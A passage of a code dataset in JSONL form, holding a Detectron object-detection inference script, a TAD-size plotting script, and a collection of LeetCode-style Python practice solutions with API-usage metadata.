"usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "autodepgraph.graph.Graph", "line_number": 15, "usage_type": "call"}, {"api_name": "autodepgraph.visualization.get_type_symbol_map", "line_number": 20, "usage_type": "call"}, {"api_name": "autodepgraph.visualization", "line_number": 20, "usage_type": "name"}, {"api_name": "autodepgraph.visualization.type_symbol_map", "line_number": 22, "usage_type": "attribute"}, {"api_name": "autodepgraph.visualization", "line_number": 22, "usage_type": "name"}, {"api_name": "autodepgraph.visualization.type_symbol_map", "line_number": 23, "usage_type": "attribute"}, {"api_name": "autodepgraph.visualization", "line_number": 23, "usage_type": "name"}, {"api_name": "autodepgraph.visualization.get_state_col_map", "line_number": 27, "usage_type": "call"}, {"api_name": "autodepgraph.visualization", "line_number": 27, "usage_type": "name"}, {"api_name": "autodepgraph.visualization.state_cmap", "line_number": 30, "usage_type": "attribute"}, {"api_name": "autodepgraph.visualization", "line_number": 30, "usage_type": "name"}, {"api_name": "autodepgraph.visualization.state_cmap", "line_number": 31, "usage_type": "attribute"}, {"api_name": 
"autodepgraph.visualization", "line_number": 31, "usage_type": "name"}, {"api_name": "autodepgraph.visualization.state_cmap", "line_number": 32, "usage_type": "attribute"}, {"api_name": "autodepgraph.visualization", "line_number": 32, "usage_type": "name"}, {"api_name": "autodepgraph.visualization.state_cmap", "line_number": 33, "usage_type": "attribute"}, {"api_name": "autodepgraph.visualization", "line_number": 33, "usage_type": "name"}, {"api_name": "autodepgraph.visualization.state_cmap", "line_number": 34, "usage_type": "attribute"}, {"api_name": "autodepgraph.visualization", "line_number": 34, "usage_type": "name"}, {"api_name": "autodepgraph.visualization.snapshot_to_nxGraph", "line_number": 40, "usage_type": "call"}, {"api_name": "autodepgraph.visualization", "line_number": 40, "usage_type": "name"}, {"api_name": "autodepgraph.visualization.draw_graph_mpl", "line_number": 51, "usage_type": "call"}, {"api_name": "autodepgraph.visualization", "line_number": 51, "usage_type": "name"}, {"api_name": "autodepgraph.graph.Graph", "line_number": 59, "usage_type": "call"}, {"api_name": "autodepgraph.visualization.draw_graph_pyqt", "line_number": 62, "usage_type": "call"}, {"api_name": "autodepgraph.visualization", "line_number": 62, "usage_type": "name"}, {"api_name": "autodepgraph.visualization.draw_graph_pyqt", "line_number": 64, "usage_type": "call"}, {"api_name": "autodepgraph.visualization", "line_number": 64, "usage_type": "name"}, {"api_name": "qcodes.Instrument._all_instruments.keys", "line_number": 84, "usage_type": "call"}, {"api_name": "qcodes.Instrument", "line_number": 84, "usage_type": "attribute"}, {"api_name": "qcodes.Instrument.find_instrument", "line_number": 87, "usage_type": "call"}, {"api_name": "qcodes.Instrument", "line_number": 87, "usage_type": "attribute"}]} +{"seq_id": "18057519736", "text": "from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\nimport sys\nfrom collections import defaultdict\nimport cv2 # NOQA (Must import before importing caffe2 due to bug in cv2)\nimport glob\nimport logging\nimport os\nimport sys\nimport time\nimport numpy as np\nfrom caffe2.python import workspace\n\nfrom detectron.core.config import assert_and_infer_cfg\nfrom detectron.core.config import cfg\nfrom detectron.core.config import merge_cfg_from_file\nfrom detectron.utils.io import cache_url\nfrom detectron.utils.logging import setup_logging\nfrom detectron.utils.timer import Timer\nimport detectron.core.test_engine as infer_engine\nimport detectron.datasets.dummy_datasets as dummy_datasets\nimport detectron.utils.c2 as c2_utils\nimport detectron.utils.vis as vis_utils\nimport copy\nc2_utils.import_detectron_ops()\n\nworkspace.GlobalInit(['caffe 2', '--caffe2_log_level=0'])\n\ndummy_coco_datasets = dummy_datasets.get_coco_dataset()\n# OpenCL may be enabled by default in OpenCV3; disable it because it's not\n# thread safe and causes unwanted GPU memory allocations.\ncv2.ocl.setUseOpenCL(False)\ndef convert_from_cls_format(cls_boxes, cls_segms, cls_keyps):\n \"\"\"Convert from the class boxes/segms/keyps format generated by the testing\n code.\n \"\"\"\n box_list = [b for b in cls_boxes if len(b) > 0]\n if len(box_list) > 0:\n boxes = np.concatenate(box_list)\n else:\n boxes = None\n if cls_segms is not None:\n segms = [s for slist in cls_segms for s in slist]\n else:\n segms = None\n if cls_keyps is not None:\n keyps = [k for klist in cls_keyps for k in klist]\n else:\n keyps = None\n 
classes = []\n for j in range(len(cls_boxes)):\n classes += [j] * len(cls_boxes[j])\n return boxes, segms, keyps, classes\n\n\ndef get_class_string(class_index, score, dataset):\n class_text = dataset.classes[class_index] if dataset is not None else \\\n 'id{:d}'.format(class_index)\n return class_text + ' {:0.2f}'.format(score).lstrip('0')\n\n\ndef convert_from_cls_format(cls_boxes, cls_segms, cls_keyps):\n \"\"\"Convert from the class boxes/segms/keyps format generated by the testing\n code.\n \"\"\"\n box_list = [b for b in cls_boxes if len(b) > 0]\n if len(box_list) > 0:\n boxes = np.concatenate(box_list)\n else:\n boxes = None\n if cls_segms is not None:\n segms = [s for slist in cls_segms for s in slist]\n else:\n segms = None\n if cls_keyps is not None:\n keyps = [k for klist in cls_keyps for k in klist]\n else:\n keyps = None\n classes = []\n for j in range(len(cls_boxes)):\n classes += [j] * len(cls_boxes[j])\n return boxes, segms, keyps, classes\n\n# def Convert_bbox_to_json(im_height,im_width,bbox,classes):\n# \"\"\"Convert the result of bbox to json file\"\"\"\n# if bbox is None or classes is None:\n# return None\n# global dummy_coco_datasets\n# if len(bbox) != len(classes):\n# return None\n# all_boxes = []\n# for i in range(len(bbox)):\n# each_box = {}\n# each_box['conf'] = int(bbox[i][-1] * 100)\n# each_box['x'] = bbox[i][0] / im_width\n# each_box['y'] = bbox[i][1] / im_height\n# each_box['width'] = bbox[i][2] / im_width - each_box['x']\n# each_box['height'] = bbox[i][3] / im_height - each_box['y']\n# each_box['name'] = dummy_coco_datasets['classes'][classes[i]]\n# all_boxes.append(each_box)\n# return all_boxes\n\ndef Convert_bbox_to_json(im_height,im_width,bbox,classes):\n \"\"\"Convert the result of bbox to json file\"\"\"\n if bbox is None or classes is None:\n return None\n global dummy_coco_datasets\n if len(bbox) != len(classes):\n return None\n all_boxes = []\n for i in range(len(bbox)):\n each_box = {}\n each_box['conf'] = int(bbox[i][-1] * 100)\n each_box['x'] = bbox[i][0]\n each_box['y'] = bbox[i][1]\n each_box['width'] = bbox[i][2]- each_box['x']\n each_box['height'] = bbox[i][3] - each_box['y']\n each_box['name'] = dummy_coco_datasets['classes'][classes[i]]\n all_boxes.append(each_box)\n return all_boxes\n\ndef visual_all_box(im,boxes,classes):\n \"\"\"rectangle the bbox\"\"\"\n if boxes is None or classes is None:\n return im\n if len(boxes) != len(classes):\n return im\n for i in range(len(boxes)):\n bbox =[int(item) for item in boxes[i][:4]]\n conf = boxes[i][-1]\n if conf < 0.7:\n continue\n category_id = classes[i]\n category_name = str(category_id)\n #category_name = dummy_coco_datasets['classes'][category_id]\n #print (category_name)\n point1 = (bbox[0],bbox[1])\n point2 = (bbox[2],bbox[3])\n #print (point1)\n color_list = [(0,255,0),(0,0,255),(255,255,0),(255,0,255),(0,255,255)]\n color = color_list[i%5]\n im[bbox[1]:bbox[1]+10,bbox[0]:bbox[2]] = color\n cv2.rectangle(im,point1,point2,color,1)\n cv2.putText(im,category_name,(bbox[0],bbox[1]+8),2,0.5,(0,0,0))\n return im\ndef visual_box(im,boxes,classes):\n \"\"\"rectangle the bbox\"\"\"\n if boxes is None or classes is None:\n return im\n if len(boxes) != len(classes):\n return im\n imcopy =copy.deepcopy(im)\n area_no_drew_point1 = (0,0)\n area_no_drew_point2 = (250,1920)\n for i in range(len(boxes)):\n bbox =[int(item) for item in boxes[i][:4]]\n conf = boxes[i][-1]\n category_id = classes[i]\n category_name = dummy_coco_datasets['classes'][category_id]\n #print (category_name)\n point1 = 
(bbox[0],bbox[1])\n point2 = (bbox[2],bbox[3])\n #print (point1)\n color = (255,0,0)\n category_list = ['person','bicycle','car','bus','truck','motorcycle']\n #color_list = [(0,255,0),(0,0,255),(255,255,0),(0,255,255),(255,0,255),(255,0,0)]\n if category_name in category_list:\n if category_name == 'person':\n color = (228,108,15)\n else:\n color = (225,242,61)\n if conf > 0.8:\n x1 = point1[1]\n y1 = point1[0]\n x2 = point2[1]\n y2 = point2[0]\n im[x1:x2,y1:y1+2] = color\n im[x1:x1+2,y1:y2] = color\n im[x2-2:x2,y1:y2] = color\n im[x1:x2,y2-2:y2] = color\n #cv2.rectangle(im,point1,point2,color,3)\n #im[bbox[1]:bbox[1]+10,bbox[0]:bbox[2]] = color\n #cv2.putText(im,category_name,(bbox[0],bbox[1]+8),2,0.5,(0,0,0))\n #print (category_name)\n #print (point1,point2,area_no_drew_point1,area_no_drew_point2)\n #print ('**********************')\n #print (((x1+x2)/2),((y1+y2)/2))\n if area_no_drew_point1[0] < (x1 + x2)/2 < area_no_drew_point2[0] and area_no_drew_point1[1] < (y1 + y2)/2 < area_no_drew_point2[1]:\n continue\n imcopy[x1:x2,y1:y1+2] = color\n imcopy[x1:x1+2,y1:y2] = color\n imcopy[x2-2:x2,y1:y2] = color\n imcopy[x1:x2,y2-2:y2] = color\n return im,imcopy\n\nclass DetectronInfer():\n def __init__(self,cfgPath,weights,gpu_id,if_visual):\n self.gpu_id = gpu_id\n self.cfgPath = cfgPath\n self.weights = weights\n self.if_visual = if_visual\n merge_cfg_from_file(self.cfgPath)\n assert_and_infer_cfg(cache_urls = False,make_immutable=False)\n self.model = infer_engine.initialize_model_from_cfg(self.weights,gpu_id=self.gpu_id)\n \n def infer(self,im):\n if im is None:\n return None\n im_height = im.shape[0]\n im_width = im.shape[1]\n timers = defaultdict(Timer)\n with c2_utils.NamedCudaScope(self.gpu_id):\n cls_boxes, cls_segms, cls_keyps = infer_engine.im_detect_all(\n self.model, im, None, timers=timers\n )\n boxes, segms, keyps, classes = convert_from_cls_format(cls_boxes,cls_segms,cls_keyps)\n if self.if_visual:\n return visual_all_box(im,boxes,classes),boxes,classes\n else:\n return boxes,classes,segms\n\ndef destroy_all():\n workspace.ResetWorkspace()\n\nif __name__ == \"__main__\":\n weightsPath = '/mnt/hdd2/workspace/zhanghang/dataset/model/e2e_mask_rcnn_R-101-FPN_2x.pkl'\n cfgPath = '/mnt/hdd2/workspace/zhanghang/dataset/model/e2e_mask_rcnn_R-101-FPN_2x.yaml'\n if_visual = False\n\n detector1 = DetectronInfer(cfgPath,weightsPath,gpu_id=1, if_visual=if_visual)\n detector2 = DetectronInfer(cfgPath,weightsPath,gpu_id=2, if_visual= if_visual)\n filename = \"/detectron/demo/15673749081_767a7fa63a_k.jpg\"\n im = cv2.imread(filename)\n\n print (detector1.infer(im))\n print (detector2.infer(im))\n \n\"\"\"\n import threading\n class myThread(threading.Thread):\n def __init__(self,detector,count,thread_id,im):\n threading.Thread.__init__(self)\n self.count = count\n self.detector = detector\n self.thread_id = thread_id\n self.im = im\n def run(self):\n while self.count:\n boxes,classes = self.detector.infer(im)\n print(self.thread_id,boxes[0],classes[0])\n self.count -= 1\n\n thread1 = myThread(detector1,10,1,im)\n thread2 = myThread(detector2,10,2,im)\n \n thread1.start()\n thread2.start()\n thread1.join()\n thread2.join() \n\"\"\"\n\n\n\n", "repo_name": "hzhang33BEI/detectron_infer_coco_mask_bbox", "sub_path": "detector.py", "file_name": "detector.py", "file_ext": "py", "file_size_in_byte": 9545, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "detectron.utils.c2.import_detectron_ops", "line_number": 27, 
"usage_type": "call"}, {"api_name": "detectron.utils.c2", "line_number": 27, "usage_type": "name"}, {"api_name": "caffe2.python.workspace.GlobalInit", "line_number": 29, "usage_type": "call"}, {"api_name": "caffe2.python.workspace", "line_number": 29, "usage_type": "name"}, {"api_name": "detectron.datasets.dummy_datasets.get_coco_dataset", "line_number": 31, "usage_type": "call"}, {"api_name": "detectron.datasets.dummy_datasets", "line_number": 31, "usage_type": "name"}, {"api_name": "cv2.ocl.setUseOpenCL", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.ocl", "line_number": 34, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 70, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 145, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 146, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 154, "usage_type": "call"}, {"api_name": "detectron.core.config.merge_cfg_from_file", "line_number": 204, "usage_type": "call"}, {"api_name": "detectron.core.config.assert_and_infer_cfg", "line_number": 205, "usage_type": "call"}, {"api_name": "detectron.core.test_engine.initialize_model_from_cfg", "line_number": 206, "usage_type": "call"}, {"api_name": "detectron.core.test_engine", "line_number": 206, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 213, "usage_type": "call"}, {"api_name": "detectron.utils.timer.Timer", "line_number": 213, "usage_type": "argument"}, {"api_name": "detectron.utils.c2.NamedCudaScope", "line_number": 214, "usage_type": "call"}, {"api_name": "detectron.utils.c2", "line_number": 214, "usage_type": "name"}, {"api_name": "detectron.core.test_engine.im_detect_all", "line_number": 215, "usage_type": "call"}, {"api_name": "detectron.core.test_engine", "line_number": 215, "usage_type": "name"}, {"api_name": "caffe2.python.workspace.ResetWorkspace", "line_number": 225, "usage_type": "call"}, {"api_name": "caffe2.python.workspace", "line_number": 225, "usage_type": "name"}, {"api_name": "cv2.imread", "line_number": 235, "usage_type": "call"}]} +{"seq_id": "6772689976", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n\"\"\"\n%prog infile.list [Options]\n \n To plot the sizes distribution of tad.\n Example:\n %prog infile.list\n %prog infile1,infile2,infile3\n %prog infile.list --xlim=\"(100,2000)\"\n\n\"\"\"\n\n\nimport numpy as np\nimport os\nimport os.path as op\nimport pandas as pd\nimport seaborn as sns\nimport sys\n\n\n\ndef import_data(infile):\n df = pd.read_csv(infile, header=None, sep='\\t')\n return df\n\ndef chrom_size_convert(size):\n exts = [\"\", 'kb', 'Mb', 'Gb']\n i = 0\n while size >= 1000:\n size = size // 1000\n i += 1\n return \"{}{}\".format(int(size), exts[i])\n\n\ndef plot_tad_sizes(sizes_dict, xlim=(50, 800)):\n import matplotlib as mpl\n mpl.use('Agg')\n import matplotlib.pyplot as plt\n \n xlim_start, xlim_end = xlim\n plt.figure(figsize=(6,5))\n for species in sizes_dict:\n size = sizes_dict[species]\n sns.distplot(size.values//1000, hist=False, kde=True, \n label=\"{} ({})\".format(species, len(size)), kde_kws={'linewidth':3})\n plt.xticks(np.linspace(xlim_start, xlim_end, 11),\n list(map(int, np.linspace(xlim_start, xlim_end, 11))), rotation=45, ha='center')\n plt.xlim(xlim_start, xlim_end)\n plt.xlabel('TAD Sizes (kb)')\n plt.ylabel('Density')\n\n prefix = \"_\".join(sizes_dict.keys())\n plt.savefig('{}_tad_sizes_distribution.pdf'.format(prefix), 
dpi=300)\n\n\ndef main(infile_list, xlim):\n if op.exists(infile_list):\n infile_list = [i.strip() for i in open(infile_list) if i.strip()]\n else:\n infile_list = infile_list.split(',')\n\n outprefix_list = list(map(lambda x: x.split(\"_\")[0], infile_list))\n df_list = list(map(import_data, infile_list))\n sizes_list = list(map(lambda x: x[2] - x[1], df_list))\n sizes_dict = dict(zip(outprefix_list, sizes_list))\n \n xlim = eval(xlim)\n plot_tad_sizes(sizes_dict, xlim)\n\nif __name__ == "__main__":\n from optparse import OptionParser\n\n p = OptionParser(__doc__)\n p.add_option(\"--xlim\", default=\"(50, 800)\",\n help=\"the xlim of xticks [default: %default]\")\n\n opts, args = p.parse_args()\n \n if len(args) != 1:\n sys.exit(p.print_help())\n infile_list, = args\n \n\n main(infile_list, opts.xlim)\n", "repo_name": "wangyibin/TDGP", "sub_path": "utils/plot_tad_sizes_distribution.py", "file_name": "plot_tad_sizes_distribution.py", "file_ext": "py", "file_size_in_byte": 2267, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pandas.read_csv", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.use", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "seaborn.distplot", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path", "line_number": 60, "usage_type": "name"}, {"api_name": "optparse.OptionParser", "line_number": 76, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 83, "usage_type": "call"}]}
+{"seq_id": "410853295", "text": "def f807(grid):\n max_row = [max(row) for row in grid]\n max_col = [max(col) for col in zip(*grid)]\n res = 0\n for i, row in enumerate(grid):\n for j, h in enumerate(row):\n res += min(max_row[i], max_col[j]) - h\n return res\n\ngrid = [ [3, 0, 8, 4], \n [2, 4, 5, 7],\n [9, 2, 6, 3],\n [0, 3, 1, 0] ]\n\nprint(f807(grid))\n\n###############################\n#reversed inorder traversal\ndef f1038(root):\n if not root:\n return None\n q, res, presum = [], root, 0\n while q or root:\n while root:\n q.append(root)\n root = root.right\n node = q.pop()\n presum += node.val\n node.val = presum\n root = node.left\n return res\n\n###############################\n\nimport string\nimport random\nclass f535:\n alphac = string.ascii_letters + string.digits\n \n def __init__(self):\n self.url2code = {}\n 
self.code2url = {}\n \n def encode(self, longUrl):\n while longUrl not in self.url2code:\n code = ''.join(random.choice(f535.alphac) for _ in range(6))\n if code not in self.code2url:\n self.code2url[code] = longUrl\n self.url2code[longUrl] = code\n return 'http://tinyurl.com/' + self.url2code[longUrl]\n \n def decode(self, shortUrl):\n return self.code2url[shortUrl[-6:]]\n \n\n###############################\n\nclass TreeNode:\n def __init__(self, val, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\ndef f108(N):\n if not N: \n return None\n l, r = 0, len(N)-1\n if l <= r:\n mid = (l + r) // 2\n\n node = TreeNode(N[mid])\n node.left = f108(N[:mid])\n node.right = f108(N[mid+1:])\n \n return node\n\n\n###############################\n\ndef f654(N):\n if not N: \n return None\n #l, r = 0, len(N)-1\n mid = N.index(max(N))\n\n node = TreeNode(N[mid])\n node.left = f654(N[:mid])\n node.right = f654(N[mid+1:])\n\n return node\n\n###############################\n\ndef f701(root, val):\n if not root:\n return TreeNode(val)\n if val < root.val:\n if not root.left:\n root.left = TreeNode(val)\n else:\n f701(root.left, val)\n else:\n if not root.right:\n root.right = TreeNode(val)\n else:\n f701(root.right, val)\n return root\n\n###############################\n\nimport itertools\n\ndef f1079(tiles):\n return sum(len(set(itertools.permutations(tiles, i))) for i in range(1, len(tiles)+1))\n\n#OR\n\ndef f1079_2(tiles):\n res = {\"\"}\n for c in tiles:\n res |= {d[:i] + c + d[i:] for d in res for i in range(len(d)+1)}\n return len(res) - 1\n\n\n\n\n###############################\n\ndef f544(N):\n team = list(map(str, range(1, N+1)))\n while N > 1:\n for i in range(N//2):\n team[i] = \"({}, {})\".format(team[i], team.pop())\n N //= 2\n return team[0]\n\n\n###############################\n\nimport bisect\ndef f1008(A):\n def helper(i, j):\n if i == j: return None\n root = TreeNode(A[i])\n mid = bisect.bisect(A, A[i], i+1, j)\n root.left = helper(i+1, mid)\n root.right = helper(mid, j)\n return root\n return helper(0, len(A))\n\ndef f1008_1(A):\n if not A:\n return None\n node = TreeNode(A.pop(0))\n i, n = 0, len(A)\n while i < n and A[i] < node.val:\n i += 1\n node.left = f1008_1(A[:i])\n node.right = f1008_1(A[i:])\n return node\n \n \n\ndef f1008_2(A):\n root = TreeNode(A[0])\n q = [root]\n for v in A[1:]:\n if v < q[-1].val:\n q[-1].left = TreeNode(v)\n q.append(q[-1].left)\n else:\n while q and v > q[-1].val:\n node = q.pop()\n node.right = TreeNode(v)\n q.append(node.right)\n return root\n\n\n###############################\n\nimport collections\ndef f950(deck):\n d = collections.deque()\n for x in sorted(deck)[::-1]:\n d.rotate()\n d.appendleft(x)\n return list(d)\n\ndef f950_2(deck):\n ind = list(range(len(deck)))\n for n in sorted(deck):\n deck[ind[0]] = n\n ind = ind[2:] + [ind[1]] if len(ind) > 1 else []\n return deck\n\n\n###############################\n\ndef f1100(strs, k):\n if len(strs)< k:\n return 0\n res = []\n for i in range(len(strs)-k+1):\n if len(set(strs[i:i+k])) == k:\n res.append(strs[i:i+k])\n return res\n\n###############################\n\ndef f894(N):\n N = N - 1\n if N == 0:\n return [TreeNode(0)]\n res = []\n for i in range(1, min(20, N), 2):\n for left in f894(i):\n for right in f894(N - i):\n root = TreeNode(0)\n root.left = left\n root.right = right\n res += [root]\n return res\n\n\ndef f894_2(N):\n res = {}\n def dfs(A):\n if len(A) == 1: return [TreeNode(0)]\n if str(A) in res: return res[str(A)]\n current = []\n for i in 
range(len(A)):\n if len(A[:i])%2== 1 and len(A[i+1:])%2 == 1:\n lefty = dfs(A[:i])\n righty = dfs(A[i+1:])\n for l in lefty:\n for r in righty:\n curr = TreeNode(0)\n curr.left = l\n curr.right = r\n current.append(curr)\n res[str(A)] = current\n return current\n return dfs(list(range(N)))\n\n###############################\n\ndef f763(strs):\n start, res = 0, []\n while start < len(strs):\n end = len(strs) - strs[::-1].find(strs[start])\n if end > start:\n end = max(len(strs) - strs[::-1].find(i) for i in set(strs[start:end]))\n res.append(end - start)\n start = end - 1\n start += 1\n return res\n\ndef f763_2(strs):\n d, res, l, r = {}, [], 0, 0\n for i, v in enumerate(strs):\n d[v] = i\n for i in range(len(strs)):\n r = max(r, d[strs[i]])\n if i == r:\n res.append(i-l+1)\n l = i + 1\n return res\n\n \n###############################\n\ndef f814(root):\n if not root:\n return None\n root.left = f814(root.left)\n root.right = f814(root.right)\n if not root.left and not root.right and not root.val: return None\n return root\n\n###############################\n\ndef f890(words, pat):\n res = []\n for w in words:\n if len(w) == len(pat) and [w.find(i) for i in w] == [pat.find(j) for j in pat]:\n res.append(w)\n return res\n\n#OR\n\n#return [w for w in words if [w.index(c) for c in w] == [pat.index(c) for c in pat]]\n\n\n\n###############################\n\n\ndef f797(graph):\n def dfs(cur, path):\n if cur == len(graph) - 1:\n res.append(path)\n else:\n for i in graph[cur]:\n dfs(i, path + [i])\n res = []\n dfs(0, [0])\n return res\n\n\n\n###############################\n\n\ndef f1104(label):\n level, tot = -1, 0\n while label > tot:\n level += 1\n tot += (2 ** level)\n \n level -= 1\n cur = label // 2\n res = [label]\n while level > -1:\n st, end = 2 ** level, (2 **(level+1)) - 1\n cur = st + end - cur\n res.append(cur)\n level -= 1\n cur = cur // 2\n return res[::-1]\n\n###############################\n\ndef f921(S):\n r, l = 0, []\n for s in S:\n if s == \"(\":\n l.append(s)\n elif l: # s == \")\" and l\n l.pop()\n else:\n r += 1\n return r + len(l)\n\n###############################\n\ndef f861(A):\n for i in range(len(A)):\n if A[i][0] == 0:\n for j in range(len(A[0])):\n A[i][j] = 1 - A[i][j] #flip all the rows, that has a 0 in the front.\n \n base = 1\n sumtotal = 0\n for j in range(len(A[0])-1, -1, -1):\n sumcol = sum([A[i][j] for i in range(len(A))])\n sumtotal += base * max(sumcol, len(A) - sumcol)\n base = base * 2\n \n return sumtotal\n \n\n###############################\n\ndef f979(self, root):\n self.res = 0\n def dfs(node):\n if not node: return 0\n left = dfs(node.left)\n right = dfs(node.right)\n self.res += abs(left) + abs(right)\n return node.val + left + right - 1\n dfs(root)\n return self.res\n\ndef f979_2(root):\n def dfs(node):\n if not node: return 0, 0\n (lbal, lcnt), (rbal, rcnt) = dfs(node.left), dfs(node.right) \n #(value, accumulated moves)\n bal = node.val + lbal + rbal - 1\n return bal, lcnt + rcnt + abs(bal)\n return dfs(root)[1]\n\n \n \n###############################\n\ndef f968(root):\n if not root.left and not root.right:\n return 1\n res = []\n d = {root: None}\n q = collections.deque([root])\n while q:\n node = q.popleft()\n if node.left:\n d[node.left] = node\n q.append(node.left)\n if node.right:\n d[node.right] = node\n q.append(node.right)\n res.append(node)\n \n dp = {}\n for i in range(len(res) -1, -1, -1):\n parent = d[res[i]]\n if res[i] in dp or res[i].left in dp or res[i].right in dp:\n continue\n dp[parent] = 1\n return 
sum(dp.values())\n\n###############################\n\ndef f517(machines):\n total, n = sum(machines), len(machines)\n if total % n: return -1\n target, res, toRight = total/n, 0, 0 \n #toRight means the clothes that we need to pass to the right number.\n for m in machines:\n toRight = m + toRight - target\n res = max(res, abs(toRight), m - target)\n return res\n\n\ndef f517_2(machines):\n total, n = sum(machines), len(machines)\n if total % n: return -1\n target, ans, send_out = total/n, 0, [0]*n \n for i in range(n-1):\n if machines[i] > target:\n send_out[i] += machines[i] - target\n elif machines[i] < target:\n send_out[i+1] = target - machines[i]\n machines[i+1] += machines[i] - target\n ans = max(ans, send_out[i], send_out[i+1])\n return ans\n\n###############################\n\n###############################\n\n\ndef f366(root):\n def dfs(node):\n if not node:\n return -1\n i = 1 + max(dfs(node.left), dfs(node.right)) #i is the level from leaves\n if i == len(res):\n res.append([])\n res[i].append(node.val)\n return i\n res = []\n dfs(root)\n return res\n\n###############################\n\ndef f419(board):\n if len(board) == 0: return 0\n m, n = len(board), len(board[0])\n cnt = 0\n for i in range(m):\n for j in range(n):\n if board[i][j] == 'X' and \\\n (i == 0 or board[i-1][j] == '.') and \\\n (j == 0 or board[i][j-1] == '.'):\n cnt += 1\n return cnt\n\n###############################\n\ndef f537(a, b):\n a1, a2 = map(int, a[:-1].split('+'))\n b1, b2 = map(int, b[:-1].split('+'))\n return '%d+%di' %(a1*b1 - a2*b2, a1*b2 + a2*b1)\n\n###############################\n\ndef f338(N):\n res = []\n for n in range(N+1):\n cnt = 0\n while n:\n if n%2: cnt += 1\n n //= 2\n res.append(cnt)\n return res\n\n#OR\n for n in range(N+1):\n res.append(bin(n).count('1'))\n return res\n\n#OR\n res = [0]\n while len(res) < N+1:\n res += [ i + 1 for i in res]\n return res[:N+1]\n\n###############################\n\ndef f54(M):\n if not M: return []\n l, r, u, d, res = 0, len(M[0])-1, 0, len(M)-1, []\n while l<=r and u <=d:\n res.extend(M[u][l:r+1]) #left to right\n u += 1\n for i in range(u, d+1):\n res.append(M[i][r]) #up to down\n r -= 1\n if u <= d:\n res.extend(M[d][l:r+1][::-1]) #right to left\n d -= 1\n if l <= r:\n for i in range(d, u-1, -1):\n res.append(M[i][l]) #down to up\n l += 1\n return res\n\ndef f54_2(M):\n return M and [*M.pop(0)] + f54_2([*zip(*M)][::-1])\n\n###############################\n \ndef f59(N):\n A, low = [], N*N+1\n while low > 1:\n low, high = low - len(A), low\n A = [range(low, high)] + zip(*A[::-1])\n return A\n\n\ndef f59_2(N):\n if not N:\n return []\n res = [[0]*N for _ in range(N)]\n l, r, u, d, n = 0, N-1, 0, N-1, 1\n while l <= r and u <= d:\n for i in range(l, r+1):\n res[u][i] = n\n n += 1\n u += 1\n \n for i in range(u, d+1):\n res[i][r] = n\n n += 1\n r -= 1\n \n for i in range(r, l-1, -1):\n res[d][i] = n\n n += 1\n d -= 1\n \n for i in range(d, u-1, -1):\n res[i][l] = n\n n += 1\n l += 1\n \n return res\n \n###############################\n\ndef f885(R, C, r0, c0):\n res, n, k = [[r0, c0]], R*C, 1\n direct, ind = [(-1, 0), (0, 1), (1, 0), (0, -1)], 1\n while len(res) < n:\n for _ in range(2):\n for _ in range(k):\n r0 += direct[ind][0]\n c0 += direct[ind][1]\n if 0<=r0= 0:\n res[i] = res[ind] = 1\n \n#( is 1 point, ) is -1 point.We try to keep total points of two groups even, by distributing parentheses alternatively.\ndef f1111_2(self, seq):\n A = B = 0\n res = [0] * len(seq)\n for i, c in enumerate(seq):\n v = 1 if c == '(' else -1\n if (v > 0) == (A < B):\n A += v\n else:\n 
B += v\n res[i] = 1\n return res\n\n###############################\n\ndef f1123(root):\n def helper(node):\n if not node:\n return 0, None\n h1, lca1 = helper(node.left)\n h2, lca2 = helper(node.right)\n if h1 > h2:\n return h1 + 1, lca1\n if h1 < h2:\n return h2 + 1, lca2\n return h1 + 1, root\n return helper(root)[1]\n\n###############################\n\ndef f723(board):\n R, C = len(board), len(board[0])\n changed = True\n \n while changed:\n changed = False\n for r in range(R):\n for c in range(C-2):\n if abs(board[r][c]) == abs(board[r][c+1]) == abs(board[r][c+2]) != 0:\n board[r][c] = board[r][c+1] = board[r][c+2] = 0\n change = True\n \n for r in range(R-2):\n for c in range(C):\n if abs(board[r][c]) == abs(board[r+1][c]) == abs(board[r+2][c]) != 0:\n board[r][c] = board[r+1][c] = board[r+2][c] = 0\n change = True\n\n\n for c in range(C):\n i = R - 1\n for r in range(R-1, -1, -1): #reversed(range(R))\n if board[r][c]>0:\n board[i][c] = board[r][c]\n i -= 1\n for r in reversed(range(i+1)):\n board[r][c] = 0\n \n return board\n\n###############################\n\ndef f986(a, b):\n i, j, res = 